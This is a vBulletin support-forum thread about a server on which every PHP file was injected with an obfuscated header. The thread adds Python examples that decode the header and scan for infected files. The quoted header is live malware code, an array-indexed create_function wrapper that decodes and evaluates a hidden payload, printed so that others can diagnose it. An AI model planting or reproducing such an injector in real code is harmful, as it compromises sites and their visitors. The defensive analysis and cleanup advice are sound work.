My vBulletin Suite 4.2.0 Patch Level 2 was hacked editing all php files!

  • RedFoxy
    Senior Member
    • Sep 2007
    • 233

    [Forum] My vBulletin Suite 4.2.0 Patch Level 2 was hacked editing all php files!

    Hi all!
    My forum was hacked or similar. I can't use it because all php files are edited and ALL have code added at the top:

    Code:
    <?php$md5 = "2a91cf451e08d33f50a63c22ad76930c";
    $af = array("a","(","_",")","$",'s','r','4',"o",'i',"z","6","g","t",'d',"b","c","l","e",";",'v','f',"n");
    $bf2 = create_function('$'.'v',$af[18].$af[20].$af[0].$af[17].$af[1].$af[12].$af[10].$af[9].$af[22].$af[21].$af[17].$af[0].$af[13].$af[18].$af[1].$af[15].$af[0].$af[5].$af[18].$af[11].$af[7].$af[2].$af[14].$af[18].$af[16].$af[8].$af[14].$af[18].$af[1].$af[4].$af[20].$af[3].$af[3].$af[3].$af[19]);
    $bf2('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');
    ?>
    Please check for vulnerabilities!!!
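The header quoted above can be read without running it. This added example (not part of the original post; the function names are hypothetical) resolves the `$af[...]` lookups statically and shows the string handed to `create_function`. The payload passed to `$bf2` is not reproduced here.

```python
import re

# First two statements of the header quoted in the post (payload omitted).
SAMPLE = r'''$af = array("a","(","_",")","$",'s','r','4',"o",'i',"z","6","g","t",'d',"b","c","l","e",";",'v','f',"n");
$bf2 = create_function('$'.'v',$af[18].$af[20].$af[0].$af[17].$af[1].$af[12].$af[10].$af[9].$af[22].$af[21].$af[17].$af[0].$af[13].$af[18].$af[1].$af[15].$af[0].$af[5].$af[18].$af[11].$af[7].$af[2].$af[14].$af[18].$af[16].$af[8].$af[14].$af[18].$af[1].$af[4].$af[20].$af[3].$af[3].$af[3].$af[19]);'''

# One quoted literal (no escapes) followed by "," or the closing ")".
LIT = re.compile(r'''\s*(?:"([^"\\]*)"|'([^'\\]*)')\s*([,)])''')

def parse_php_array(src, name):
    """Read the literals of `$name = array(...)` as text; nothing is executed."""
    start = re.search(r'\$%s\s*=\s*array\(' % re.escape(name), src)
    if not start:
        raise ValueError("array $%s not found" % name)
    pos, items = start.end(), []
    while True:
        m = LIT.match(src, pos)
        if not m:
            raise ValueError("unsupported array element at offset %d" % pos)
        items.append(m.group(1) if m.group(1) is not None else m.group(2))
        pos = m.end()
        if m.group(3) == ")":
            return items

def decode_header(src, name="af"):
    """Return the function body that the index concatenation spells out."""
    table = parse_php_array(src, name)
    call = re.search(r'create_function\((.*?)\);', src, re.S)
    if not call:
        raise ValueError("create_function call not found")
    indexes = re.findall(r'\$%s\[(\d+)\]' % re.escape(name), call.group(1))
    return "".join(table[int(i)] for i in indexes)

if __name__ == "__main__":
    print(decode_header(SAMPLE))
```

The result is a decode-and-evaluate wrapper around whatever string is passed to `$bf2`, which is why every infected file looks the same at the top.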
  • Zachery
    Former vBulletin Support
    • Jul 2002
    • 59097

    #2
    There is NOTHING in vBulletin that would allow for any file, let alone all files, to be edited. This is a server issue.

    Comment

    • whitey10tc
      Senior Member
      • Jan 2011
      • 415
      • 4.0.x

      #3
      Yes a server issue. Find how the server was accessed and fix it. Then move on to fixing the files. Best bet is remove the infected and reload.
      www.cdmagurus.com
      www.cellphone-gurus.com

      Comment

      • RedFoxy
        Senior Member
        • Sep 2007
        • 233

        #4
        Any suggestions for finding it?

        Comment

        • ericfahey
          New Member
          • Nov 2011
          • 13
          • 4.1.x

          #5
          Originally posted by RedFoxy
          Any suggestions for finding it?
          Ask your host for ftp logs.

          Comment

          • Lynne
            Former vBulletin Support
            • Oct 2004
            • 26255

            #6
            Your host should be able to provide logs that show who has accessed the server and from what IP. Ask them for these logs.

            Please don't PM or VM me for support - I only help out in the threads.
            vBulletin Manual & vBulletin 4.0 Code Documentation (API)
            Want help modifying your vbulletin forum? Head on over to vbulletin.org
            If I post CSS and you don't know where it goes, throw it into the additional.css template.

            W3Schools <- awesome site for html/css help

            Comment

            • RedFoxy
              Senior Member
              • Sep 2007
              • 233

              #7
              Originally posted by ericfahey
              Ask your host for ftp logs.
              I've no FTP

              Originally posted by Lynne
              Your host should be able to provide logs that show who has accessed the server and from what IP. Ask them for these logs.
              Looks like that's a vulnerability of php because I found other websites on my server with php edited

              - - - Updated - - -

              I looked for access by ssh but nothing, all logs are ok

              Comment

              • borbole
                Senior Member
                • Feb 2010
                • 3074
                • 4.0.0

                #8
                Originally posted by RedFoxy
                I've no FTP

                Looks like that's a vulnerability of php because I found other websites on my server with php edited
                In that case ask your host to upgrade the php on their server. They should be using the latest version of it.

                To clean up your forum files, overwrite them with a fresh set from your version of vb which you can download from your customer area. Also check your server space for anything out of the ordinary such as files with malicious code left behind and things of that kind.

                Comment

                • RedFoxy
                  Senior Member
                  • Sep 2007
                  • 233

                  #9
                  it was harder to do it because it changed ALL .php files of all websites

                  Comment

                  • G.I.JOE*MFA*
                    Member
                    • Jun 2002
                    • 61
                    • 4.1.x

                    #10
                    any modifications added? look for vulnerabilities there

                    the rest of the mod community would be very interested if you discover a bad mod

                    Comment

                    • Wayne Luke
                      vBulletin Technical Support Lead
                      • Aug 2000
                      • 73976

                      #11
                      Originally posted by RedFoxy
                      it was harder to do it because it changed ALL .php files of all websites
                      Some vulnerability on your server allowed them to upload a script somewhere. The script does a listing of all php files and adds its code to the top. This is pretty basic stuff in all reality. Not very difficult to do.

                      Even if you don't use FTP on the site they can get in via FTP if the daemon is running. They can get passwords from email, FTP, or telnet. Someone else on the server could upload a vulnerability. There could be problems in Apache, PHP, MySQL, Java or even the server kernel that needs to be updated. Quite a few hundred places to look on a typical server for vulnerabilities.
                      Translations provided by Google.

                      Wayne Luke
                      The Rabid Badger - a vBulletin Cloud demonstration site.
                      vBulletin 5 API

                      Comment
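For the cleanup and log requests discussed in this thread, a read-only sweep can list which `.php` files carry the header from post #1 and when they were last modified. This is an added example, not code from any poster or from vBulletin; the signature regex and function names are assumptions built from the traits of that one sample.

```python
import os
import re
import sys
import time

# Traits of the header quoted in post #1: near the top of the file, a
# create_function() call whose body is glued together from array lookups.
SIGNATURE = re.compile(
    rb"create_function\s*\([^;]{0,200}?(?:\$\w+\[\d+\]\s*\.\s*){8,}", re.S)
HEAD_BYTES = 4096  # the injected code sits above the original source

def is_injected(path):
    """True if the first HEAD_BYTES of a PHP file carry the header traits."""
    with open(path, "rb") as fh:
        head = fh.read(HEAD_BYTES)
    return head.lstrip().startswith(b"<?php") and bool(SIGNATURE.search(head))

def scan(root):
    """Walk root read-only; return sorted (mtime, path) for flagged .php files."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            try:
                if is_injected(path):
                    hits.append((os.path.getmtime(path), path))
            except OSError:
                continue  # unreadable file: skip, do not abort the sweep
    return sorted(hits)

def modified_window(hits):
    """Earliest and latest mtime of flagged files, as UTC strings, or None."""
    if not hits:
        return None
    fmt = lambda t: time.strftime("%Y-%m-%d %H:%M:%S", time.gmtime(t))
    return fmt(hits[0][0]), fmt(hits[-1][0])

if __name__ == "__main__":
    found = scan(sys.argv[1] if len(sys.argv) > 1 else ".")
    for mtime, path in found:
        print(path)
    # mtimes can be reset by whoever wrote the files; treat the window as a
    # starting point for the log request, not as proof of timing.
    print("modified between (UTC):", modified_window(found))
```

Files that are flagged should be replaced from a fresh download as advised above; a file that is not flagged is not thereby shown to be clean, since the sweep only knows this one header.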

                      • Hartmut
                        Senior Member
                        • Nov 2007
                        • 2870
                        • 4.2.x

                        #12
                        There has been a browser plugin from Adobe which had exploits, and due to that it was possible to access ftp programs and transfer the site information + passwords to a third party. Check if you have your browser plugins updated and change all passwords for each ftp site.
                        No private support, only PM me when I ask for it. Support in the forums only.

                        Comment
